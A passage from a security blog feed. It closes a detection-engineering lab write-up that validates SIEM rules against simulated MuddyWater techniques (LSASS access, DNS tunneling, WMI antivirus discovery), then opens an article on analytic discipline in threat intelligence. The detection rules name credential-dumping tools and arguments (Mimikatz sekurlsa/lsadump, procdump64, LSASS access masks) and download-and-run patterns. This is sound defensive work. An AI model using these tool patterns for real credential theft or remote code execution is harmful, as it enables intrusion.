subdomain labels are the telemetry signature.</p><p><strong>Simulation:</strong> 60 Resolve-DnsName queries with 42-character random labels against *.test.internal.</p><p><strong>KQL:</strong></p><pre>winlog.event_id: 22<br>AND winlog.event_data.QueryName: *.test.internal*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yt5HdYyG3lGJi-pY88VPXA.png"></figure><p><strong>Result: PASS</strong> — 180 Sysmon EID 22 events captured. 42-character random labels visible in QueryName field. Volume threshold (Rule A) and label-length threshold (Rule B) would both trigger in a production deployment.</p><h4>Step 30: det_mw_0009 — WMI SecurityCenter2 Discovery</h4><p><strong>What MuddyWater does:</strong> CISA AA22–055A documents a post-access survey script that queries root\SecurityCenter2\AntiVirusProduct via WMI — enumerating the installed AV product before deciding how to proceed. This is also combined with OS info, network config, and user queries in a single script.</p><p><strong>Simulation (Rule A):</strong> Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 4104<br>AND winlog.event_data.ScriptBlockText: *SecurityCenter2*</pre><p><strong>Rule A Result: PASS</strong> — 21 PS EID 4104 events. SecurityCenter2 visible in decoded ScriptBlockText.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wpLAuTyJkLgoqezMzJWISA.png"></figure><blockquote><strong><em>Detection value:</em></strong><em> SecurityCenter2 + AntiVirusProduct is one of the highest-specificity behavioral signals in this dataset. Its legitimate caller population is tiny: only AV management consoles and a few inventory tools query this namespace. A PowerShell process making this query outside those exceptions warrants immediate investigation.</em></blockquote><h4>Step 31: det_mw_0010 — LSASS Memory Access</h4><p><strong>What MuddyWater does:</strong> Uses Mimikatz, procdump64.exe, and LaZagne to dump LSASS memory and extract credentials. CISA AA22–055A names all three tools.</p><p><strong>Rule A simulation:</strong> .NET OpenProcess(PROCESS_QUERY_INFORMATION, lsass.pid) — opens a handle to lsass.exe with a minimal access mask, triggering Sysmon EID 10.</p><p><strong>KQL — Rule A:</strong></p><pre>winlog.event_id: 10<br>AND winlog.event_data.TargetImage: *lsass.exe*<br>AND winlog.event_data.GrantedAccess: 0x1400</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*G-oMtjgeEzuCIKfTDznKzA.png"></figure><p><strong>Rule A Result: PASS</strong> — 3,398 Sysmon EID 10 events with GrantedAccess: 0x1400 and TargetImage: lsass.exe. The high event count is expected — LSASS receives many legitimate handle requests from AV, EDR, and Windows system processes. Production deployment requires an allowlist of known-good callers.</p><p><strong>Rule C simulation:</strong> Write a 4-byte MDMP header as lsass_test.dmp to C:\Temp\dh-lab\ — triggers Sysmon EID 11.</p><p><strong>KQL — Rule C:</strong></p><pre>winlog.event_id: 11<br>AND winlog.event_data.TargetFilename: *.dmp*<br>AND winlog.event_data.TargetFilename: *Temp*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TrCWgKcujqKdBRCX-OG26w.png"></figure><p><strong>Rule C Result: PASS</strong> — 6 Sysmon EID 11 events. C:\Temp\dh-lab\lsass_test.dmp creation captured.</p><blockquote><strong><em>Lab safety:</em></strong><em> The </em><em>.dmp file was deleted immediately after event confirmation. No credential material exists in the file — it was a 4-byte header stub. No real LSASS dump was performed.</em></blockquote><h3>Phase 5 Validation Results Summary</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Yl6Y0h2_ePVKH3i8einFDQ.png"></figure><p>Full run: ansible-playbook playbooks/validate.yml — <strong>ok=70 changed=42 failed=0</strong></p><ul><li>Step 21 — <strong>det_mw_0001</strong> · Process spawn → <strong>PASS</strong></li><li>Step 22 — <strong>det_mw_0002</strong> · Shell from service → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule A (-e + Base64) → <strong>PASS</strong></li><li>Step 23 — <strong>det_mw_0003</strong> · Rule B (IEX + DownloadString) → <strong>PASS</strong></li><li>Step 24 — <strong>det_mw_0004</strong> · EID 7 ImageLoad → <strong>PARTIAL</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule A (OutlookMicrosift) → <strong>PASS</strong></li><li>Step 25 — <strong>det_mw_0005</strong> · Rule C (WSF in Startup) → <strong>PASS</strong></li><li>Step 26 — <strong>det_mw_0006</strong> · schtasks /mo 43 → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule A (RMM from \Temp) → <strong>PASS</strong></li><li>Step 27 — <strong>det_mw_0007</strong> · Rule B (RMM from PS parent) → <strong>PASS</strong></li><li>Step 28 — <strong>det_mw_0008a</strong> · EID 3 Telegram → <strong>FAIL</strong></li><li>Step 29 — <strong>det_mw_0008b</strong> · EID 22 DNS tunneling → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule A (SecurityCenter2 EID 4104) → <strong>PASS</strong></li><li>Step 30 — <strong>det_mw_0009</strong> · Rule B (wmic SecurityCenter2) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule A (LSASS EID 10) → <strong>PASS</strong></li><li>Step 31 — <strong>det_mw_0010</strong> · Rule C (.dmp EID 11) → <strong>PASS</strong></li></ul><p><strong>13 PASS / 1 PARTIAL / 1 FAIL</strong> across 16 rule checks.</p><h3>Phase 6: Coverage Matrix</h3><p>Of 22 ATT&amp;CK techniques documented in the source set:</p><ul><li><strong>15 techniques (68%)</strong> — score 5, fully lab-validated</li><li><strong>2 techniques (9%)</strong> — score 4, correlated and validated via fallback</li><li><strong>4 techniques (18%)</strong> — score 3, rule present but validation incomplete</li><li><strong>7 techniques</strong> — score 0, no detection (Lateral Movement, Collection, Exfiltration, Impact)</li></ul><p><strong>The six capability gates</strong> that determine your effective coverage floor:</p><ul><li><strong>PowerShell Script Block Logging (EID 4104)</strong> — unlocks det_mw_0003 Rule B and det_mw_0009 Rules A/C. Without it: detection degrades to command-line heuristics only.</li><li><strong>Sysmon EID 10 (ProcessAccess)</strong> — unlocks det_mw_0010 Rule A (tool-agnostic LSASS access). Without it: falls back to binary name matching, misses custom dumpers.</li><li><strong>Sysmon EID 7 (ImageLoad)</strong> — unlocks det_mw_0004 (DLL side-loading). Without it: DLL loads are completely invisible.</li><li><strong>DNS resolver logging (full QNAME)</strong> — unlocks det_mw_0008b (DNS tunneling). Without it: Mori C2 channel is invisible.</li><li><strong>Network flow / proxy logs</strong> — unlocks det_mw_0007 Rule C and det_mw_0008a. Without it: RMM and Telegram C2 network-layer coverage lost.</li><li><strong>Email gateway telemetry (SEG)</strong> — unlocks det_mw_0001 full correlated logic. Without it: email-to-endpoint correlation unavailable.</li></ul><h3>What Defenders Should Do Right Now</h3><p><strong>1. Baseline your RMM deployments.</strong> det_mw_0007 is the most consistently documented MuddyWater technique across all five source tiers. It fires on ScreenConnect, SimpleHelp, AteraAgent, Level, and PDQConnect from non-standard paths. But it needs a baseline of authorized deployments first. Build the baseline; the detection logic is already written.</p><p><strong>2. Enable PowerShell Script Block Logging fleet-wide.</strong> One Group Policy change:</p><pre>Computer Configuration → Administrative Templates → Windows Components<br>→ Windows PowerShell → Turn on PowerShell Script Block Logging → Enabled</pre><p>This unlocks det_mw_0003 Rule B and all three det_mw_0009 rules. No other change required.</p><p><strong>3. Configure Sysmon ProcessAccess against lsass.exe.</strong> Without it, LSASS credential dumping detection is binary-name-only. Renamed Mimikatz and custom C++ dumpers are invisible. Add &lt;ProcessAccess onmatch="include"&gt; targeting lsass.exe to sysmon.xml.</p><p><strong>4. Hunt for PT43M now.</strong> Query your Task Scheduler Operational logs for any task with a RepetitionInterval of PT43M. If you find one you didn't create, that is BugSleep. No other legitimate software uses this interval.</p><h3>Reproduce It Yourself</h3><p>The entire project is on GitHub: <a href="https://github.com/anpa1200/operation-desert-hydra"><strong>github.com/anpa1200/operation-desert-hydra</strong></a></p><p>One repository contains everything: Docker Compose stack (OpenCTI + Elasticsearch + Kibana), Vagrant lab VM, Ansible provisioning playbooks, detection rules in four formats (Sigma, KQL, Elastic JSON, SPL), structured intelligence datasets (YAML), and all 12 proof screenshots.</p><p><strong>Deploy:</strong></p><pre>git clone https://github.com/anpa1200/operation-desert-hydra.git<br>cd operation-desert-hydra<br>cp stack/.env.template stack/.env<br># fill in ELASTIC_PASSWORD, OPENCTI_ADMIN_PASSWORD, OPENCTI_ADMIN_TOKEN<br>bash start.sh<br># → OpenCTI: http://localhost:8080<br># → Kibana:  http://localhost:5601<br># → all 11 simulations run automatically (~10 min)</pre><p><strong>Stop / destroy:</strong></p><pre>bash stop.sh                # halt VM, keep stack and data<br>bash stop.sh --destroy-vm   # remove VM disk<br>bash stop.sh --destroy-stack  # also stop Docker stack</pre><p><strong>Skip the lab VM</strong> (OpenCTI + Kibana only, no Windows VM):</p><pre>bash start.sh --skip-lab</pre><p>Prerequisites: Docker, VirtualBox, Vagrant, Ansible, Python 3 + pywinrm. Full details in the <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/README.md">README</a>.</p><p>Key files:</p><ul><li>docs/article-step-0-project-scenario.md — full phase-by-phase walkthrough</li><li>data/detections.yaml — all 11 detection records with coverage scores</li><li>lab/ansible/playbooks/validate.yml — the 11 simulation playbook</li><li>detections/sigma/, detections/kql/, detections/elastic/, detections/spl/ — rule exports</li></ul><h3>What This Project Is Not</h3><p>This is not a red team toolkit. The lab produces benign telemetry for detection validation — no live malware, no real C2, no credential theft. The detection pseudologic is SIEM-agnostic and requires production translation and tuning before deployment. Coverage scores are conservative: 5 requires a Kibana screenshot, not just passing logic.</p><p>The source base is entirely public. The actor’s actual TTPs may be more sophisticated than what is documented. Treat the coverage matrix as a floor, not a ceiling.</p><h3>Production Scars</h3><p>Everything above describes what the project looks like after it worked. This section documents what broke, in what order, and what was actually fixed — the kind of detail that gets cut from writeups but is the most useful part for anyone trying to reproduce this.</p><h4>Scar 1: The Simulations Were Faking It</h4><p>The first validation attempt used synthetic event markers. The simulation playbook injected a DH-SIM-0001 string into the CommandLine field, then the Kibana queries looked for that exact string:</p><pre>winlog.event_id: 1 AND winlog.event_data.CommandLine: *DH-SIM-0001*</pre><p>This produces a screenshot. It does not prove a detection works.</p><p>The problem is fundamental: a query that looks for a marker you injected proves that injection works, not that a detection fires on real attacker behavior. If MuddyWater runs wscript.exe and spawns powershell.exe -EncodedCommand, the DH-SIM-0001 query returns nothing. The detection coverage number was meaningless.</p><p><strong>What was fixed:</strong> All simulations were rewritten to produce realistic execution chains — wscript.exe spawning powershell.exe -EncodedCommand &lt;base64&gt;, schtasks.exe /create /sc minute /mo 43, lsass.exe being accessed by a test process with the correct GrantedAccess mask. All KQL queries were rewritten to use real field-based conditions: winlog.event_data.ParentImage, winlog.event_data.GrantedAccess, winlog.event_data.TargetObject, winlog.event_data.ScriptBlockText. Every proof screenshot now shows a real field value, not a synthetic marker.</p><p><strong>The lesson:</strong> A proof screenshot is only as good as the conditions that trigger it. If the simulation writes what the query reads, you have a tautology, not a detection.</p><h4>Scar 2: det_mw_0004 — The DLL That Wouldn’t Load</h4><p>The simulation for det_mw_0004 (DLL side-loading) created a 4-byte MZ-header stub file named Goopdate.dll in a temp directory alongside GoogleUpdate.exe, then waited for Sysmon Event ID 7 (ImageLoad) to fire.</p><p>It never fired.</p><p>Root cause: a 4-byte MZ stub is not a valid PE binary. The Windows loader parses the PE header before loading — the stub fails the loader’s structural validation and is rejected before the load event is generated. Sysmon only generates EID 7 for DLLs that actually get mapped into process memory. A file that fails to load produces no EID 7.</p><p>The Sysmon configuration was correct. The detection rule was correct. The simulation was wrong.</p><p><strong>Result: PARTIAL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> The test needs a real, valid DLL — even an empty DLL compiled from a single DllMain that returns TRUE. Alternatively, installing the actual Google Chrome on the lab VM provides a real Goopdate.dll at the expected path, which could then be copied to a non-standard location. Neither was done in this iteration due to lab scope constraints (no internet access on the VM for Chrome installation, no compiler toolchain in the lab).</p><p><strong>The lesson:</strong> When validating EID 7 detections, your test artifact must be a valid loadable PE. A stub file saves time and produces nothing.</p><h4>Scar 3: det_mw_0008a — VirtualBox NAT Ate the Telegram Traffic</h4><p>The simulation for det_mw_0008a (Telegram Bot API C2) made an outbound HTTPS connection to api.telegram.org from PowerShell and waited for Sysmon Event ID 3 (NetworkConnect) to fire.</p><p>It never fired.</p><p>Root cause: VirtualBox NAT performs network address translation at the hypervisor level. Sysmon captures network connections at the Windows kernel level. With NAT, the connection from the VM’s perspective terminates at the NAT gateway (10.0.2.2), not at api.telegram.org. Sysmon sees a connection to 10.0.2.2:443, not api.telegram.org:443. The detection rule looking for api.telegram.org as the destination found nothing.</p><p>There was an additional layer: VirtualBox NAT does not forward arbitrary outbound HTTPS traffic by default in this lab configuration — the VM had no direct internet path, only access to the host’s 10.0.2.2 gateway. Even fixing the Sysmon observation problem would require a working internet path from the VM.</p><p><strong>Result: FAIL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> Add a host-only or bridged network adapter to the VM that provides direct internet access, and confirm Sysmon captures the connection with the external destination. Alternatively, run a local HTTPS server on the host at api.telegram.org via a hosts file override, which would make the destination resolvable within the lab and catchable by Sysmon.</p><p><strong>The lesson:</strong> VirtualBox NAT is the right choice for lab isolation (the VM cannot reach the internet accidentally), but it is the wrong choice if you need to validate detections based on external destination hostnames. Design the network topology before writing detection validation cases.</p><h4>Scar 4: Kibana Showed Nothing — Wrong Time Window</h4><p>After running the SecurityCenter2 WMI discovery simulation (Step 30), the Kibana query returned zero results.</p><p>The query was correct. The simulation had run correctly. The events were in Elasticsearch.</p><p>Root cause: Kibana’s default time window was set to “Last 15 minutes.” The simulation had run in a previous lab session, and Winlogbeat had shipped the events to Elasticsearch during that session. The events existed — they were just outside the current time window.</p><p><strong>What was fixed:</strong> Changed the time filter to “Last 24 hours.” Events appeared immediately.</p><p><strong>The lesson:</strong> When a Kibana proof shows no results, the first diagnostic step is the time filter, not the query. This is obvious in retrospect and a consistent source of false “detection failed” conclusions during initial validation runs.</p><h4>Scar 5: Detection Design Bugs Found in Review (Before Validation)</h4><p>Before running any simulations, every detection record went through a structured review pass. Four real bugs were found:</p><p><strong>det_mw_0010 Rule B — Operator precedence error.</strong> The original pseudologic was:</p><pre>event_type = process_create AND<br>image IMATCHES "mimikatz\.exe" OR<br>image ENDSWITH "procdump64.exe" OR<br>command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)"</pre><p>Without explicit parentheses, OR has lower precedence than AND in most query languages. The command_line IMATCHES clause was evaluated independently of the event_type guard, meaning the rule would fire on any event (not just process_create) where the command line contained sekurlsa. In a SIEM with millions of events per day, this generates noise and potentially masks the real signal. The fix added explicit brackets to keep all OR branches inside the event_type = process_create guard.</p><p><strong>det_mw_0009 Rule C — T1033 was not covered.</strong> The initial Rule C matched SecurityCenter2, Win32_NetworkAdapterConfiguration, and Win32_OperatingSystem — covering T1518.001, T1016, and T1082. The documented CISA script also collects the username via Win32_ComputerSystem. T1033 (System Owner/User Discovery) was missing. Fixed by adding Win32_ComputerSystem|Win32_UserAccount|UserName to the pattern match.</p><p><strong>det_mw_0004 Rule A — Missing x86 Google path.</strong> The initial allowlist only contained the x64 path C:\Program Files\Google\. On 64-bit Windows, the 32-bit Google Update installs to C:\Program Files (x86)\Google\. Without the x86 path in the allowlist, any Goopdate.dll load from the legitimate 32-bit Google installation would fire the detection. Added both paths.</p><p><strong>det_mw_0010 Rule A — Access mask set too narrow.</strong> The initial mask set covered standard Mimikatz masks (0x1010, 0x1410, 0x1438) but missed 0x1fffff (PROCESS_ALL_ACCESS, used by custom C++ dumpers and some loaders) and 0x1f0fff (another all-access variant observed in field reporting). A detection that only catches stock Mimikatz masks is bypassed by any custom implementation. Extended the mask set to cover known custom-dumper variants.</p><p><strong>The lesson:</strong> Writing pseudologic in a YAML field with no syntax validation means operator precedence bugs survive until someone reads the logic carefully. Structured peer review — ideally by someone who will try to break the rule — catches these before they hit production.</p><h4>Scar 6: The OpenCTI Stack Was in a Different Repository</h4><p>The original project structure had the OpenCTI Docker Compose stack in a separate repository (opencti-intelligent-shield) that was not included in the desert-hydra repo. The start.sh script referenced the external repo with a hardcoded path. Cloning operation-desert-hydra and running start.sh failed immediately on any machine other than the development machine.</p><p><strong>What was fixed:</strong> The entire stack — docker-compose.yml, docker-compose.kibana.yml, and .env.template — was copied into stack/ inside the desert-hydra repo. All path references were updated. The repo is now fully self-contained: git clone + cp .env.template .env + bash start.sh works from a clean machine with no external dependencies beyond Docker, Vagrant, VirtualBox, Ansible, and pywinrm.</p><p><strong>The lesson:</strong> A reproducibility claim requires everything needed to reproduce to be in the same repository. External path dependencies are invisible during development and obvious on first external clone.</p><h4>Scar 7: MITRE Connector Timing</h4><p>The import script (tools/opencti_import.py) creates MuddyWater → uses → ATT&amp;CK technique relationships by looking up techniques that the MITRE ATT&amp;CK connector has synced into OpenCTI. The connector takes several minutes to complete its initial sync of 846 techniques.</p><p>If the import script runs before the connector finishes, the technique lookup returns nothing — the techniques don’t exist yet. The original script failed silently on these lookups and skipped the relationship creation.</p><p><strong>What was fixed:</strong> The script was updated with find_or_create_attack_pattern(): if a technique is not yet in OpenCTI, create a stub AttackPattern object with the correct x_mitre_id. When the MITRE connector eventually syncs that technique, OpenCTI's deduplication logic merges the stub with the connector's fully populated object. All relationships that were created against the stub are preserved and now point to the enriched object. Running the script a second time after the connector finishes confirms existing objects rather than creating duplicates.</p><p><strong>The lesson:</strong> Any script that creates relationships against objects populated by a connector needs to handle the case where the connector has not finished. Fail loudly or create stubs — don’t skip silently.</p><h4>Surviving Gaps</h4><p>Two failures from Phase 5 remain open:</p><p><strong>det_mw_0004</strong> — DLL side-loading detection (EID 7) is not lab-validated. The detection rule is sound; the simulation needs a valid PE DLL. Coverage score stays at 3 until the lab is extended with a compiled test DLL.</p><p><strong>det_mw_0008a</strong> — Telegram Bot API connection detection (EID 3) is not lab-validated. The detection rule is sound; the lab network topology prevents capturing external destination hostnames via NAT. Coverage score stays at 3 until the VM has a direct internet path or a local HTTPS proxy target.</p><p>These are documented as open items, not dismissed as “out of scope.” The coverage score scale is designed to reflect this: a score of 3 means “behavioral detection, no lab proof” — it is honest about the gap rather than claiming coverage that was not validated.</p><p><strong>Seven ATT&amp;CK techniques have zero detection coverage.</strong> Lateral movement (T1021.001 RDP, T1550.002 Pass the Hash), Collection (T1005, T1039), Exfiltration (T1041), and Impact (T1486 ransomware, T1490 shadow copy deletion from DarkBit). These are acknowledged in the coverage matrix, not hidden. The actor uses them. The public source base documents them. The detection coverage does not exist in this iteration.</p><p><em>All code, data, and proof screenshots are version-controlled at </em><a href="https://github.com/anpa1200/operation-desert-hydra"><em>github.com/anpa1200/operation-desert-hydra</em></a></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=34da7917acf0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0">Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Applying Sherman Kent’s Analytic Discipline to CTI: A Practical Analyst Guide]]></title>
<description><![CDATA[Estimative language, evidence discipline, and analytic integrity for cyber threat intelligenceExecutive SummaryThis is an analyst guide, not a formal CTI report. It does not answer a single priority intelligence requirement, assess one actor or campaign end to end, provide an IOC package, or prod...]]></description>
<link>https://tsecurity.de/de/3580440/hacking/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580440/hacking/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide/</guid>
<pubDate>Mon, 08 Jun 2026 06:38:18 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Estimative language, evidence discipline, and analytic integrity for cyber threat intelligence</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*le-GPHh7adFR9iex1Ff7qQ.png"></figure><h3>Executive Summary</h3><p>This is an analyst guide, not a formal CTI report. It does not answer a single priority intelligence requirement, assess one actor or campaign end to end, provide an IOC package, or produce a defensive detection plan. Its purpose is narrower: show how cyber threat intelligence analysts can apply Sherman Kent-style analytic discipline to public evidence without overstating what the evidence proves.</p><p>Sherman Kent was one of the central figures in professionalizing U.S. intelligence analysis. His writing emphasized clear estimative language, policy relevance, analytic independence, evidence discipline, explicit uncertainty, and the separation of fact from judgment (<a href="https://www.cia.gov/resources/csi/studies-in-intelligence/archives/vol-8-no-4/words-of-estimative-probability/">CIA, Words of Estimative Probability</a>; <a href="https://www.cia.gov/readingroom/document/cia-rdp78-04718a000600100003-3">CIA, The Intelligence Process: A Digest from Strategic Intelligence</a>; <a href="https://www.cia.gov/resources/csi/static/Kent-Profession-Intel-Analysis.pdf">CIA, Sherman Kent and the Profession of Intelligence Analysis</a>).</p><p>This article uses <strong>“Kent-style analytic discipline”</strong> as shorthand for that professional tradition. It is not claiming that there is one official, codified “Sherman Kent doctrine” that directly governs modern CTI. The safer claim is that Kent’s principles are consistent with later Intelligence Community analytic standards and structured analytic technique guidance, including ICD 203 and the CIA tradecraft primer (<a href="https://www.dni.gov/files/documents/ICD/ICD-203.pdf">ODNI, ICD 203</a>; <a href="https://www.cia.gov/resources/csi/static/Tradecraft-Primer-apr09.pdf">CIA, A Tradecraft Primer</a>).</p><p>For CTI, this matters because analysts often work from incomplete telemetry, vendor reporting, malware analysis, infrastructure links, victimology, and government attribution statements. Those evidence types do not all prove the same thing. A file hash can support a malware-family claim. A command-and-control pattern can support a campaign link. Victimology can support a targeting assessment. None of those, by itself, proves adversary intent or state tasking.</p><p>This guide therefore focuses on one standard: make the reader see where evidence ends and assessment begins.</p><h3>Table of Contents</h3><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#4a1e"><strong>Evidence and Confidence Model Used Here</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#b693"><strong>Estimative Probability Reference</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#8b22"><strong>What Is Sherman Kent-Style Analytic Discipline?</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#43ac"><strong>What Maps From Traditional Intelligence to CTI — And What Does Not</strong></a></p><ul><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#285d"><strong>1. Policy Relevance Without Policy Capture</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#18ed"><strong>2. Facts, Assumptions, and Judgments</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#c7e3"><strong>3. Estimative Probability Language</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#bf34"><strong>4. Confidence Is Not Probability</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#bbfe"><strong>5. Alternative Hypotheses</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#da72"><strong>6. Warning, Indicators, and Collection Gaps</strong></a></li><li><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#796b"><strong>7. Analytic Integrity in CTI</strong></a></li></ul><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#8e8e"><strong>Cognitive Biases CTI Analysts Should Name</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#b411"><strong>Where ATT&amp;CK and the Pyramid of Pain Fit</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#99f2"><strong>Kent-Style Checklist</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#2ba7"><strong>Practical Analyst Template</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#a5ae"><strong>Conclusion</strong></a></p><p><a href="https://infosecwriteups.com/applying-sherman-kents-analytic-discipline-to-cti-a-practical-analyst-guide-33142ad7553b#a513"><strong>References</strong></a></p><h3>Evidence and Confidence Model Used Here</h3><p><strong>This article uses these evidence labels:</strong></p><ul><li><strong>Author-observed:</strong> directly inspected by the author. This article rarely uses this label because it is based on public reporting, not original telemetry or reverse engineering.</li><li><strong>Source-observed:</strong> the cited source claims direct access to evidence, such as imagery, telemetry, malware samples, incident response data, or official records.</li><li><strong>Reported:</strong> stated by a cited source, but not independently verified here.</li><li><strong>Assessed:</strong> analytic judgment made by a cited source.</li><li><strong>Inferred:</strong> reasonable interpretation made in this article from public evidence, but not directly observed.</li></ul><p><strong>Qualifiers are tracked separately from evidence labels:</strong></p><ul><li><strong>Qualifier / limitation:</strong> ambiguity, scope limit, alternate explanation, source-access constraint, or reason the evidence should not be overinterpreted.</li></ul><p><strong>Confidence attaches to a specific assessment, not to an example as a whole:</strong></p><ul><li><strong>High confidence:</strong> strong source access, strong credibility, meaningful corroboration, and a short inference chain.</li><li><strong>Moderate confidence:</strong> credible reporting, but incomplete visibility, limited corroboration, contested interpretation, or a longer inference chain.</li><li><strong>Low confidence:</strong> plausible inference from thin, indirect, or weakly corroborated evidence.</li></ul><p><strong>Every example uses the same four-field confidence basis:</strong></p><ul><li><strong>Source access:</strong> direct telemetry, reverse engineering, official record, government statement, vendor incident response, or secondary reporting.</li><li><strong>Source reliability:</strong> established, unknown, contested, or mixed.</li><li><strong>Information credibility:</strong> corroborated, single-source, inferred, or disputed.</li><li><strong>Author verification:</strong> verified, partially verified, or not independently verified here.</li></ul><p>This is still not a formal source-grading model. Operational CTI should use a more rigorous source reliability and information credibility system, especially when reporting will support security operations, legal action, executive decision-making, or public attribution.</p><h3>Estimative Probability Reference</h3><p>Kent argued that estimative words should not be left to normal conversational ambiguity. Different organizations use different probability bands, but a CTI team should publish and reuse one internal lexicon. A simple working version is:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*O5dwFHm_ncEOU61MI32nLw.png"></figure><p>Probability is not confidence. “Likely” says how probable the judgment is. “Moderate confidence” says how strong the evidentiary basis is.</p><p>These bands are illustrative, not universal; the important control is consistency inside the publishing team.</p><h3>What Is Sherman Kent-Style Analytic Discipline?</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oXWwShvs3qtrUWIDyfreXQ.png"></figure><p>Kent-style analytic discipline can be reduced to a practical standard: intelligence analysis should help decision-makers reason under uncertainty without hiding the uncertainty. The analyst’s job is not to sound certain. The analyst’s job is to make evidence, assumptions, probability, confidence, alternatives, and collection gaps visible enough that decision-makers understand the basis and limits of the judgment.</p><p>In practice, that means:</p><ol><li><strong>Serve the decision, not the preference:</strong> Intelligence should be relevant to policy or defensive decisions, but analytic judgment should not be shaped to support a preferred outcome.</li><li><strong>Separate facts from estimates:</strong> The analyst should distinguish observed evidence from assumptions, inference, and judgment.</li><li><strong>Use estimative language deliberately:</strong> Words such as “likely,” “probably,” “possible,” and “almost certainly” should communicate probability consistently rather than act as vague hedges.</li><li><strong>State confidence separately from probability:</strong> A judgment can be likely but low confidence if evidence is thin. A judgment can be high confidence but still not certain.</li><li><strong>Expose assumptions and alternatives:</strong> Analysts should test what else could explain the same evidence.</li><li><strong>Identify collection gaps:</strong> A good estimate says what is missing, not only what is believed.</li><li><strong>Preserve analytic integrity:</strong> Intelligence should be candid about uncertainty, source weakness, and dissent.</li></ol><p>This is not a mechanical checklist. It is a writing and reasoning discipline: structure the product so the reader can audit the analytic path.</p><h3>What Maps From Traditional Intelligence to CTI — And What Does Not</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*P_kpV2peYBfbICkYx0HRhg.png"></figure><p>Traditional national-security intelligence and CTI share the same analytic problem: decisions must be made before evidence is complete. Kent-style discipline maps well to CTI in several areas:</p><ul><li><strong>Estimative language:</strong> CTI needs disciplined wording for attribution, intent, targeting, capability, and likelihood of future activity.</li><li><strong>Source access:</strong> CTI must distinguish endpoint telemetry, network logs, malware samples, sinkhole data, victim reporting, vendor clustering, government statements, and media summaries.</li><li><strong>Confidence:</strong> CTI must explain whether confidence comes from direct artifacts, multiple independent sources, long-term tracking, 